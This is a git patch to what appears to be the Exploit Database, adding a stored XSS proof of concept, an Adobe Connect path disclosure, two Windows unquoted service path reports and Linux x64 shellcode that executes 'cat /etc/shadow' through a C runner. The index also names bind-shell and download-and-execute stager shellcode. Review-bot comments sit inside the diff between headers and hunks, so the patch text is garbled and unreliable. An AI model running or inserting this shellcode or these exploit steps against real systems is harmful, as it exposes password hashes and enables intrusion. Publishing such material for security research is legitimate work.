From 0ebed6d4c41084d331fb1765dd6ee1d8a49b81fc Mon Sep 17 00:00:00 2001
From: Offensive Security
Date: Wed, 10 Feb 2021 05:01:58 +0000
Subject: [PATCH] DB: 2021-02-10 5 changes to exploits/shellcodes Epson USB Display 1.6.0.0 - 'EMP_UDSA' Unquote Service Path AnyTXT Searcher 1.2.394 - 'ATService' Unquoted Service Path Online Car Rental System 1.0 - Stored Cross Site Scripting Adobe Connect 10 - Username Disclosure Linux/x64 - execve _cat /etc/shadow_ Shellcode (66 bytes)
---
 exploits/multiple/webapps/49550.txt | 18 ++++++
 exploits/php/webapps/49546.txt | 98 +++++++++++++++++++++++++++++
 exploits/windows/local/49548.txt | 28 +++++++++
 exploits/windows/local/49549.txt | 25 ++++++++
 files_exploits.csv | 4 ++
 files_shellcodes.csv | 1 +
 shellcodes/linux_x86-64/49547.c | 63 +++++++++++++++++++
 7 files changed, 237 insertions(+)
 create mode 100644 exploits/multiple/webapps/49550.txt
 create mode 100644 exploits/php/webapps/49546.txt
 create mode 100644 exploits/windows/local/49548.txt
 create mode 100644 exploits/windows/local/49549.txt
 create mode 100644 shellcodes/linux_x86-64/49547.c
diff --git a/exploits/multiple/webapps/49550.txt b/exploits/multiple/webapps/49550.txt
new file mode 100644
index 000000000..31d4a6abd
--- /dev/null
+++ b/exploits/multiple/webapps/49550.txt
@@ -0,0 +1,18 @@
+# Title: Adobe Connect 10 - Username Disclosure
+# Author: h4shur
+# date:2021-02-07
+# Vendor Homepage: https://www.adobe.com
+# Software Link: https://www.adobe.com/products/adobeconnect.html
+# Version: 10 and earlier
+# Tested on: Windows 10 & Google Chrome
+# Category : Web Application Bugs
+
+### Description :
+
+By adding this (/system/help/support) to the end of the desired website address, you can view the username without any filter or obstacle. Sometimes even without a username and password. And by adding (/system/login) to the end of the desired website address, you can access the admin panel without any filters.
+
+### POC :
+site.com/system/help/support
+
+### Admin Panel :
+site.com/system/login
\ No newline at end of file
diff --git a/exploits/php/webapps/49546.txt b/exploits/php/webapps/49546.txt
new file mode 100644
index 000000000..a32d1da1a
--- /dev/null
+++ b/exploits/php/webapps/49546.txt
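Review bot: The description asserts that `/system/help/support` discloses a username "sometimes even without a username and password" and that `/system/login` reaches the admin panel "without any filters", but the file contains no request/response evidence, so neither claim can be verified from the write-up. Both paths appear to be standard Adobe Connect routes, so the report should state what the support page actually returned for an unauthenticated session (which field carried the username and on which server build) and whether `/system/login` bypasses authentication or is simply the login form. `# Tested on: Windows 10 & Google Chrome` describes the client; `# Version: 10 and earlier` needs the concrete server version that was tested. Without a vendor reference or identifier a defender cannot tell whether a fixed build exists.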
@@ -0,0 +1,98 @@
+# Exploit Title: Online Car Rental System 1.0 - Stored Cross Site Scripting
+# Date: 9/2/2021
+# Exploit Author: Naved Shaikh
+# Vendor Homepage: https://www.sourcecodester.com/
+# Software Link: https://www.sourcecodester.com/cc/14145/online-car-rental-system-using-phpmysql.html
+# Version: V 1.0
+# Tested on Windows 10, XAMPP
+
+Steps:
+1) Open http://localhost/car-rental/admin/post-avehical.php
+
+2) Fill All the details on the page. After submitting, capture the request and change the "vehicalorcview" parameter with our Payload "" and submit
+
+3) Open the http://localhost/car-rental/ and our Payload excuted.
+
+Request
+POST /car-rental/admin/post-avehical.php HTTP/1.1
+Host: localhost
+User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:85.0) Gecko/20100101 Firefox/85.0
+Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
+Accept-Language: en-US,en;q=0.5
+Accept-Encoding: gzip, deflate
+Content-Type: multipart/form-data; boundary=---------------------------13786099262839578593645594965
+Content-Length: 2724377
+Origin: http://localhost
+Connection: close
+Referer: http://localhost/car-rental/admin/post-avehical.php
+Cookie: PHPSESSID=h5ubatunno8u9130c4eq77anf2
+Upgrade-Insecure-Requests: 1
+
+-----------------------------13786099262839578593645594965
+Content-Disposition: form-data; name="vehicletitle"
+
+TestName
+-----------------------------13786099262839578593645594965
+Content-Disposition: form-data; name="brandname"
+
+2
+-----------------------------13786099262839578593645594965
+Content-Disposition: form-data; name="vehicalorcview"
+
+
+-----------------------------13786099262839578593645594965
+Content-Disposition: form-data; name="priceperday"
+
+200
+-----------------------------13786099262839578593645594965
+Content-Disposition: form-data; name="fueltype"
+
+Diesel
+-----------------------------13786099262839578593645594965
+Content-Disposition: form-data; name="modelyear"
+
+2008
+-----------------------------13786099262839578593645594965
+Content-Disposition: form-data; name="seatingcapacity"
+
+22
+-----------------------------13786099262839578593645594965
+Content-Disposition: form-data; name="img1"; filename="Untitled.png"
+Content-Type: image/png
+
+‰PNG
+
+-----------------------------13786099262839578593645594965
+Content-Disposition: form-data; name="img5"; filename=""
+Content-Type: application/octet-stream
+
+
+-----------------------------13786099262839578593645594965
+Content-Disposition: form-data; name="powerdoorlocks"
+
+1
+-----------------------------13786099262839578593645594965
+Content-Disposition: form-data; name="antilockbrakingsys"
+
+1
+-----------------------------13786099262839578593645594965
+Content-Disposition: form-data; name="driverairbag"
+
+1
+-----------------------------13786099262839578593645594965
+Content-Disposition: form-data; name="passengerairbag"
+
+1
+-----------------------------13786099262839578593645594965
+Content-Disposition: form-data; name="centrallocking"
+
+1
+-----------------------------13786099262839578593645594965
+Content-Disposition: form-data; name="crashcensor"
+
+1
+-----------------------------13786099262839578593645594965
+Content-Disposition: form-data; name="submit"
+
+
+-----------------------------13786099262839578593645594965--
\ No newline at end of file
diff --git a/exploits/windows/local/49548.txt b/exploits/windows/local/49548.txt
new file mode 100644
index 000000000..597d9ffd7
--- /dev/null
+++ b/exploits/windows/local/49548.txt
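Review bot: Step 2 tells the reader to replace `vehicalorcview` with `our Payload ""` and the matching form part in the captured request is empty, so the proof of concept as committed carries no payload at all — most likely the markup was stripped on import — and the report should be re-imported with the injected string preserved in a form that survives rendering (entity-encoded). Step 3 also never says where on `http://localhost/car-rental/` the stored value is echoed, which is exactly what a maintainer needs to find the sink; the fix belongs at both ends, validating the field in `post-avehical.php` and encoding it on output with `htmlspecialchars()`. `excuted` in step 3 should read `executed`.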
@@ -0,0 +1,28 @@
+# Exploit Title: Epson USB Display 1.6.0.0 - 'EMP_UDSA' Unquote Service Path
+# Discovery by: Hector Gerbacio
+# Discovery Date: 2021-02-05
+# Vendor Homepage: https://epson.com.mx/
+# Tested Version: 1.6.0.0
+# Vulnerability Type: Unquoted Service Path
+# Tested on OS: Windows 8.1 con Bing
+
+# Step to discover Unquoted Service Path:
+
+C:\>wmic service get name, displayname, pathname, startmode | findstr /i "auto" | findstr /i /v "C:\WINDOWS\\" | findstr /i "EMP_UDSA" | findstr /i /v """
+EMP_UDSA EMP_UDSA C:\Program Files (x86)\EPSON Projector\Epson USB Display V1.6\EMP_UDSA.exe Auto
+
+# Service info:
+
+C:\>sc qc EMP_UDSA
+[SC] QueryServiceConfig CORRECTO
+
+NOMBRE_SERVICIO: EMP_UDSA
+ TIPO : 110 WIN32_OWN_PROCESS (interactive)
+ TIPO_INICIO : 2 AUTO_START
+ CONTROL_ERROR : 1 NORMAL
+ NOMBRE_RUTA_BINARIO: C:\Program Files (x86)\EPSON Projector\Epson USB Display V1.6\EMP_UDSA.exe
+ GRUPO_ORDEN_CARGA :
+ ETIQUETA : 0
+ NOMBRE_MOSTRAR : EMP_UDSA
+ DEPENDENCIAS : RPCSS
+ NOMBRE_INICIO_SERVICIO: LocalSystem
\ No newline at end of file
diff --git a/exploits/windows/local/49549.txt b/exploits/windows/local/49549.txt
new file mode 100644
index 000000000..7d4e0e530
--- /dev/null
+++ b/exploits/windows/local/49549.txt
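Review bot: The report shows an unquoted `NOMBRE_RUTA_BINARIO` running as `LocalSystem` but states neither the precondition nor the remediation, so its real risk cannot be judged from the file: an unquoted path is a weakness only if a non-administrative user can create files in `C:\` or `C:\Program Files (x86)\`, which default Windows ACLs do not grant, and the write-up should show the effective permissions on those directories (e.g. `icacls` output) before calling this a privilege escalation. The fix the vendor needs is simply to quote the ImagePath, e.g. `sc config EMP_UDSA binPath= "\"C:\Program Files (x86)\EPSON Projector\Epson USB Display V1.6\EMP_UDSA.exe\""`, and a `sc qc` listing of the corrected configuration would make the report complete. The same omission applies to `exploits/windows/local/49549.txt`. The title `Unquote Service Path` (also carried into `files_exploits.csv`) should read `Unquoted Service Path`, matching the `# Vulnerability Type` line and 49549.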
@@ -0,0 +1,25 @@
+# Exploit Title: AnyTXT Searcher 1.2.394 - 'ATService' Unquoted Service Path
+# Date: 2020-12-11
+# Exploit Author: Mohammed Alshehri
+# Vendor Homepage: Anytxt.net
+# Software Link: https://sourceforge.net/projects/anytxt/files/AnyTXT.Searcher.1.2.394.exe
+# Version: Version 1.2.394
+# Tested on: Microsoft Windows 10 Education - 10.0.17763 N/A Build 17763
+
+
+# Service info:
+C:\Users\m507>sc qc ATService
+[SC] QueryServiceConfig SUCCESS
+
+SERVICE_NAME: ATService
+ TYPE : 110 WIN32_OWN_PROCESS (interactive)
+ START_TYPE : 2 AUTO_START (DELAYED)
+ ERROR_CONTROL : 1 NORMAL
+ BINARY_PATH_NAME : C:\Program Files (x86)\AnyTXT Searcher\atservice.exe
+ LOAD_ORDER_GROUP :
+ TAG : 0
+ DISPLAY_NAME : AnyTXT Searcher Indexing Service
+ DEPENDENCIES :
+ SERVICE_START_NAME : LocalSystem
+
+C:\Users\m507>
\ No newline at end of file
diff --git a/files_exploits.csv b/files_exploits.csv
index f11189bef..637808d56 100644
--- a/files_exploits.csv
+++ b/files_exploits.csv
@@ -11259,6 +11259,8 @@ id,file,description,date,author,type,platform,port
 49530,exploits/windows/local/49530.txt,"Millewin 13.39.146.1 - Local Privilege Escalation",2021-02-08,"Andrea Intilangelo",local,windows,
 49535,exploits/windows/local/49535.txt,"AMD Fuel Service - 'Fuel.service' Unquote Service Path",2021-02-08,"Hector Gerbacio",local,windows,
 49541,exploits/windows/local/49541.html,"Microsoft Internet Explorer 11 32-bit - Use-After-Free",2021-02-08,"Forrest Orr",local,windows,
+49548,exploits/windows/local/49548.txt,"Epson USB Display 1.6.0.0 - 'EMP_UDSA' Unquote Service Path",2021-02-09,"Hector Gerbacio",local,windows,
+49549,exploits/windows/local/49549.txt,"AnyTXT Searcher 1.2.394 - 'ATService' Unquoted Service Path",2021-02-09,"Mohammed Alshehri",local,windows,
 1,exploits/windows/remote/1.c,"Microsoft IIS - WebDAV 'ntdll.dll' Remote Overflow",2003-03-23,kralor,remote,windows,80
 2,exploits/windows/remote/2.c,"Microsoft IIS 5.0 - WebDAV Remote",2003-03-24,RoMaNSoFt,remote,windows,80
 5,exploits/windows/remote/5.c,"Microsoft Windows 2000/NT 4 - RPC Locator Service Remote Overflow",2003-04-03,"Marcin Wolak",remote,windows,139
@@ -43736,3 +43738,5 @@ id,file,description,date,author,type,platform,port
 49543,exploits/php/webapps/49543.txt,"WordPress Plugin Supsystic Data Tables Generator 1.9.96 - Multiple Vulnerabilities",2021-02-08,"Erik David Martin",webapps,php,
 49544,exploits/php/webapps/49544.txt,"WordPress Plugin Supsystic Contact Form 1.7.5 - Multiple Vulnerabilities",2021-02-08,"Erik David Martin",webapps,php,
 49545,exploits/php/webapps/49545.txt,"WordPress Plugin Supsystic Backup 2.3.9 - Local File Inclusion",2021-02-08,"Erik David Martin",webapps,php,
+49546,exploits/php/webapps/49546.txt,"Online Car Rental System 1.0 - Stored Cross Site Scripting",2021-02-09,"Naved Shaikh",webapps,php,
+49550,exploits/multiple/webapps/49550.txt,"Adobe Connect 10 - Username Disclosure",2021-02-09,h4shur,webapps,multiple,
diff --git a/files_shellcodes.csv b/files_shellcodes.csv
index 4490a70c4..c8766c1ef 100644
--- a/files_shellcodes.csv
+++ b/files_shellcodes.csv
@@ -1030,3 +1030,4 @@ id,file,description,date,author,type,platform
 49416,shellcodes/linux/49416.txt,"Linux/x86 - Bind (0.0.0.0:13377/TCP) Shell (/bin/sh) Shellcode (65 bytes)",2021-01-12,ac3,shellcode,linux
 49466,shellcodes/windows_x86/49466.asm,"Windows/x86 - Download File (http://10.10.10.5:8080/2NWyfQ9T.hta) Via mshta + Execute + Stager Shellcode (143 bytes)",2021-01-22,"Armando Huesca Prida",shellcode,windows_x86
 49472,shellcodes/linux/49472.c,"Linux/x64 - Bind_tcp (0.0.0.0:4444) + Password (12345678) + Shell (/bin/sh) Shellcode (142 bytes)",2021-01-25,"Guillem Alminyana",shellcode,linux
+49547,shellcodes/linux_x86-64/49547.c,"Linux/x64 - execve _cat /etc/shadow_ Shellcode (66 bytes)",2021-02-09,"Felipe Winsnes",shellcode,linux_x86-64
diff --git a/shellcodes/linux_x86-64/49547.c b/shellcodes/linux_x86-64/49547.c
new file mode 100644
index 000000000..85f905c54
--- /dev/null
+++ b/shellcodes/linux_x86-64/49547.c
@@ -0,0 +1,63 @@
+# Exploit Title: Linux/x64 - execve "cat /etc/shadow" Shellcode (66 bytes)
+# Date: 02-08-2021
+# Author: Felipe Winsnes
+# Tested on: Debian x64
+# Shellcode Length: 66
+
+/*
+global _start
+
+_start:
+
+ xor rax, rax ; Zeroes out RAX.
+ xor rbp, rbp ; Zeroes out RBP.
+
+ push rax ; Pushes RAX's NULL-DWORD.
+
+ mov rbp, 0x776f646168732f63 ; Moves value "wodahs/c" into RBP.
+ push rbp ; Pushes the vaueof RBP into the Stack.
+
+ mov rbp, 0x74652f2f2f2f2f2f ; Moves value "te//////" into RBP.
+ push rbp ; Pushes the vaue of RBP into the Stack.
+
+ mov rbp, rsp ; Copies the value of the Stack into RBP.
+ push rax ; Pushes RAX's NULL-DWORD.
+
+ mov rbx, 0x7461632f6e69622f ; Moves value "tac/nib/" into RBX.
+ push rbx ; Pushes the vaue of RBX into the Stack.
+
+ mov rbx, rsp ; Copies the value of the Stack into RBX.
+
+ mov rdi, rsp ; Copies the value of the Stack into RDI.
+ push rax ; Pushes RAX's NULL-DWORD.
+
+ mov rdx, rsp ; Copies the value of the Stack into RDX. As the previous DWORD was completely NULL, RDX is set to 0.
+
+ push rbp ; Pushes the vaue of RBP into the Stack.
+ push rbx ; Pushes the vaue of RBX into the Stack. The full string should be "cat /etc/shadow".
+
+ mov rsi, rsp ; Copies this entire string from the Stack into RSI.
+
+ push word 59 ; Pushes the value 59 (syscall value for execve in the x64 format).
+ pop ax ; Pops this value into AX so there are no NULLs.
+ syscall ; The syscall is executed.
+*/
+
+
+/*
+Usage:
+whitecr0wz@SLAE64:~/assembly/execve/cat$ gcc cat_shadow.c -o cat_shadow -fno-stack-protector -z execstack -w
+whitecr0wz@SLAE64:~/assembly/execve/cat$ ./cat_shadow
+*/
+
+#include 
+
+unsigned char shellcode[] = \
+"\x48\x31\xc0\x48\x31\xed\x50\x48\xbd\x63\x2f\x73\x68\x61\x64\x6f\x77\x55\x48\xbd\x2f\x2f\x2f\x2f\x2f\x2f\x65\x74\x55\x48\x89\xe5\x50\x48\xbb\x2f\x62\x69\x6e\x2f\x63\x61\x74\x53\x48\x89\xe3\x48\x89\xe7\x50\x48\x89\xe2\x55\x53\x48\x89\xe6\x66\x6a\x3b\x66\x58\x0f\x05";
+
+int main()
+{
+
+ int (*ret)() = (int(*)())shellcode;
+ ret();
+}
\ No newline at end of file
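Review bot: The `#include` directive near the bottom of the hunk has no header name, so the file as committed does not compile; if the missing `<stdio.h>` was stripped on import rather than absent in the submission, the import should be re-checked, since nothing in `main` uses stdio and the line could otherwise simply be dropped. Two comments in the assembly listing misstate what the instructions do and will mislead readers who use this as course material: `push rax` on x86-64 pushes a QWORD, not a `NULL-DWORD`, and `mov rdx, rsp` does not "set RDX to 0" — it makes RDX point at the NULL qword just pushed, so `envp` is a pointer to an empty NULL-terminated array, which is why `execve` accepts it. The header should also state the precondition that `/bin/cat /etc/shadow` produces output only when the hosting process already has read permission on `/etc/shadow` (root or the `shadow` group); the shellcode itself grants nothing. Finally, `int (*ret)() = (int(*)())shellcode; ret();` converts a data object to a function pointer, which ISO C does not define and which works here only because of `-z execstack` — a one-line comment saying so would spare readers surprise on hardened builds.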